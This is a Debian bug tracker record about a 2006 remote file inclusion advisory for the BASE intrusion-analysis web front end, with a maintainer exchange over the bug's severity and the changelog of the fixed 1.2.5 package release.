Report forwarded to debian-bugs-dist@lists.debian.org, Debian Security Team <team@security.debian.org>: Bug#370576; Package acidbase.
(full text, mbox, link).
Acknowledgement sent to David Gil <dgil@telefonica.net>:
New Bug report received and forwarded. Copy sent to Debian Security Team <team@security.debian.org>.
(full text, mbox, link).
Package: acidbase
Severity: grave
Tags: security
Justification: user security hole
http://www.frsirt.com/english/advisories/2006/1996
Advisory ID : FrSIRT/ADV-2006-1996
CVE ID : GENERIC-MAP-NOMATCH
Rated as : High Risk
Remotely Exploitable : Yes
Locally Exploitable : Yes
Release Date : 2006-05-26
Technical Description
Multiple vulnerabilities have been identified in Basic Analysis and Security
Engine (BASE), which could be exploited by attackers to execute arbitrary
commands. These flaws are due to input validation errors in the
"base_qry_common.php", "base_stat_common.php", and
"includes/base_include.inc.php" scripts that do not validate the "BASE_path"
parameter, which could be exploited by remote attackers to include malicious
scripts and execute arbitrary commands with the privileges of the web server.
Affected Products
Basic Analysis and Security Engine (BASE) 1.2.4 and prior
-- System Information:
Debian Release: testing/unstable
APT prefers unstable
APT policy: (500, 'unstable'), (500, 'testing'), (1, 'experimental')
Architecture: i386 (i686)
Shell: /bin/sh linked to /bin/bash
Kernel: Linux 2.6.16-2-686
Locale: LANG=es_ES@euro, LC_CTYPE=es_ES@euro (charmap=ISO-8859-15)
Information forwarded to debian-bugs-dist@lists.debian.org: Bug#370576; Package acidbase.
(full text, mbox, link).
Acknowledgement sent to David Gil <dgil@telefonica.net>:
Extra info received and forwarded to list.
(full text, mbox, link).
tags 370576 + fixed-upstream pending
thanks
Fixed in upstream BASE 1.2.5 (sarah). Expect a new package in a few
days.
Tags added: fixed-upstream, pending
Request was from David Gil <dgil@telefonica.net>
to control@bugs.debian.org.
(full text, mbox, link).
Information forwarded to debian-bugs-dist@lists.debian.org, David Gil <dgil@telefonica.net>: Bug#370576; Package acidbase.
(full text, mbox, link).
Acknowledgement sent to Kevin Johnson <kjohnson@secureideas.net>:
Extra info received and forwarded to list. Copy sent to David Gil <dgil@telefonica.net>.
(full text, mbox, link).
I have to disagree with the Severity of grave. To exploit you need
to have register_globals set to on which has not been the default in
years. We have released 1.2.5 which fixes the issue and a number of
other things. It just gets under my skin when "researchers" find
problems, elevate how serious they are and never notify the
development team.
Sorry for my rant,
Kevin
---------------------
BASE Project Lead
http://sourceforge.net/projects/secureideashttp://base.secureideas.net
The next step in IDS analysis!
On Jun 5, 2006, at 6:24 PM, David Gil wrote:
> Package: acidbase
> Severity: grave
> Tags: security
> Justification: user security hole
>
> http://www.frsirt.com/english/advisories/2006/1996
>
> Advisory ID : FrSIRT/ADV-2006-1996
> CVE ID : GENERIC-MAP-NOMATCH
> Rated as : High Risk
> Remotely Exploitable : Yes
> Locally Exploitable : Yes
> Release Date : 2006-05-26
>
> Technical Description
>
> Multiple vulnerabilities have been identified in Basic Analysis
> and Security
> Engine (BASE), which could be exploited by attackers to execute
> arbitrary
> commands. These flaws are due to input validation errors in the
> "base_qry_common.php", "base_stat_common.php", and
> "includes/base_include.inc.php" scripts that do not validate the
> "BASE_path"
> parameter, which could be exploited by remote attackers to include
> malicious
> scripts and execute arbitrary commands with the privileges of the
> web server.
>
> Affected Products
>
> Basic Analysis and Security Engine (BASE) 1.2.4 and prior
>
> -- System Information:
> Debian Release: testing/unstable
> APT prefers unstable
> APT policy: (500, 'unstable'), (500, 'testing'), (1, 'experimental')
> Architecture: i386 (i686)
> Shell: /bin/sh linked to /bin/bash
> Kernel: Linux 2.6.16-2-686
> Locale: LANG=es_ES@euro, LC_CTYPE=es_ES@euro (charmap=ISO-8859-15)
>
>
Information forwarded to debian-bugs-dist@lists.debian.org, David Gil <dgil@telefonica.net>: Bug#370576; Package acidbase.
(full text, mbox, link).
Acknowledgement sent to Kevin Johnson <kjohnson@secureideas.net>:
Extra info received and forwarded to list. Copy sent to David Gil <dgil@telefonica.net>.
(full text, mbox, link).
Information forwarded to debian-bugs-dist@lists.debian.org: Bug#370576; Package acidbase.
(full text, mbox, link).
Acknowledgement sent to David Gil <dgil@telefonica.net>:
Extra info received and forwarded to list.
(full text, mbox, link).
severity 370576 minor
thanks
El mar, 06-06-2006 a las 13:01 -0400, Kevin Johnson escribió:
> I have to disagree with the Severity of grave. To exploit you need
> to have register_globals set to on which has not been the default in
> years.
Ok, now the bug has a minor severity. You are right, base is not
exploitable with the default installation of the package.
> We have released 1.2.5 which fixes the issue and a number of
> other things.
Yes, I am aware of it. We'll upload it in a few days. I've submitted the
bug report to inform the security team (testing distribution has also
base 1.2.4) and to explain more in deep the changes in the 1.2.5
changelog.
> It just gets under my skin when "researchers" find
> problems, elevate how serious they are and never notify the
> development team.
Well, I don't understand you Kevin. I know you are subscribed to the
package tracking system of acidbase, so I know that you receive all the
bugs submitted to the package too. If you don't agree with the severty
of a bug, you can always change it as I've just done.
> Sorry for my rant,
> Kevin
Regards,
David.
Information forwarded to debian-bugs-dist@lists.debian.org, David Gil <dgil@telefonica.net>: Bug#370576; Package acidbase.
(full text, mbox, link).
Acknowledgement sent to Kevin Johnson <kjohnson@secureideas.net>:
Extra info received and forwarded to list. Copy sent to David Gil <dgil@telefonica.net>.
(full text, mbox, link).
On Jun 7, 2006, at 5:08 AM, David Gil wrote:
> severity 370576 minor
> thanks
>
Thanks...
> El mar, 06-06-2006 a las 13:01 -0400, Kevin Johnson escribió:
>> I have to disagree with the Severity of grave. To exploit you need
>> to have register_globals set to on which has not been the default in
>> years.
>
> Ok, now the bug has a minor severity. You are right, base is not
> exploitable with the default installation of the package.
>
>> We have released 1.2.5 which fixes the issue and a number of
>> other things.
>
> Yes, I am aware of it. We'll upload it in a few days. I've
> submitted the
> bug report to inform the security team (testing distribution has also
> base 1.2.4) and to explain more in deep the changes in the 1.2.5
> changelog.
>
Great... I appreciate it...
>> It just gets under my skin when "researchers" find
>> problems, elevate how serious they are and never notify the
>> development team.
>
> Well, I don't understand you Kevin. I know you are subscribed to the
> package tracking system of acidbase, so I know that you receive all
> the
> bugs submitted to the package too. If you don't agree with the severty
> of a bug, you can always change it as I've just done.
>
Sorry this was not meant toward you. I was speaking of St0ke and
Milw0rm. I apologize for venting at you and the bug tracking
system. As too changing the severity I forgot. We have been busy
around here since my new daughter arrived Monday.
>> Sorry for my rant,
>> Kevin
>
> Regards,
> David.
>
>
Thanks
Kevin
---------------------
BASE Project Lead
http://sourceforge.net/projects/secureideashttp://base.secureideas.net
The next step in IDS analysis!
Severity set to `minor' from `grave'
Request was from David Gil <dgil@telefonica.net>
to control@bugs.debian.org.
(full text, mbox, link).
Reply sent to David Gil <dgil@telefonica.net>:
You have taken responsibility.
(full text, mbox, link).
Notification sent to David Gil <dgil@telefonica.net>:
Bug acknowledged by developer.
(full text, mbox, link).
Source: acidbase
Source-Version: 1.2.5-1
We believe that the bug you reported is fixed in the latest version of
acidbase, which is due to be installed in the Debian FTP archive:
acidbase_1.2.5-1.diff.gz
to pool/main/a/acidbase/acidbase_1.2.5-1.diff.gz
acidbase_1.2.5-1.dsc
to pool/main/a/acidbase/acidbase_1.2.5-1.dsc
acidbase_1.2.5-1_all.deb
to pool/main/a/acidbase/acidbase_1.2.5-1_all.deb
acidbase_1.2.5.orig.tar.gz
to pool/main/a/acidbase/acidbase_1.2.5.orig.tar.gz
A summary of the changes between this version and the previous one is
attached.
Thank you for reporting the bug, which will now be closed. If you
have further comments please address them to 370576@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.
Debian distribution maintenance software
pp.
David Gil <dgil@telefonica.net> (supplier of updated acidbase package)
(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@debian.org)
-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
Format: 1.7
Date: Mon, 12 Jun 2006 21:20:37 +0200
Source: acidbase
Binary: acidbase
Architecture: source all
Version: 1.2.5-1
Distribution: unstable
Urgency: high
Maintainer: David Gil <dgil@telefonica.net>
Changed-By: David Gil <dgil@telefonica.net>
Description:
acidbase - Basic Analysis and Security Engine
Closes: 363548370576
Changes:
acidbase (1.2.5-1) unstable; urgency=high
.
* New upstream release, wich includes the following security improvements:
+ Added XSSPrintSafe() (array safe htmlspecilchars() function) and made
filterSql() use ADOdb qmagic()
+ Filtered all unfiltred (mainly auth system stuff) $_POST and $_GET
variables using filterSql()
+ Santized all $_SERVER variables to be protected against XSS attacks
These improvements fix the following security bugs:
+ Cross-site scripting (XSS) vulnerability (CVE-2006-1590)
(Closes: #363548).
+ Remote File Inclusion Vulnerabilities (CVE-2006-2685)
(Closes: #370576).
.
* debian/patches/02_update_external_links.dpatch : updated.
.
* Applied part of the patch from Paul Wise <pabs3@bonedaddy.net>:
+ Remove short description from long description
+ Update copyright file with more information
.
* Bump Standards-Version to 3.7.2 (no policy-related changes needed).
.
* Fix an annoying dbconfig-common error: Add dbc_dbtypes variable in
mantainer scripts, not only in config file.
This is related to bug #372948 (dbconfig-common: can not determine the
database type).
.
* Remove ucf file under /etc/acidbase on package purge.
Files:
1627500fb735f4ce19a137031d59c0c3 683 web optional acidbase_1.2.5-1.dsc
cd6a83df67106ebf9a148d5ac1ec9b8c 335819 web optional acidbase_1.2.5.orig.tar.gz
3cc7ab0405eaf4e2539f64a175af64f6 14891 web optional acidbase_1.2.5-1.diff.gz
15ce906b026e9bb7d89a4c9dd600e28d 346322 web optional acidbase_1.2.5-1_all.deb
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.2 (GNU/Linux)
iD8DBQFEjvmKsandgtyBSwkRAhSVAJ46v7d4R2rcEEMNf+YoI26PdkVpDACfdtKL
d9OHPfMIsMKT1oNU4OeTlf4=
=YUKe
-----END PGP SIGNATURE-----
Bug archived.
Request was from Debbugs Internal Request <owner@bugs.debian.org>
to internal_control@bugs.debian.org.
(Tue, 26 Jun 2007 14:50:10 GMT) (full text, mbox, link).
Debbugs is free software and licensed under the terms of the GNU General
Public License version 2. The current version can be obtained
from https://bugs.debian.org/debbugs-source/.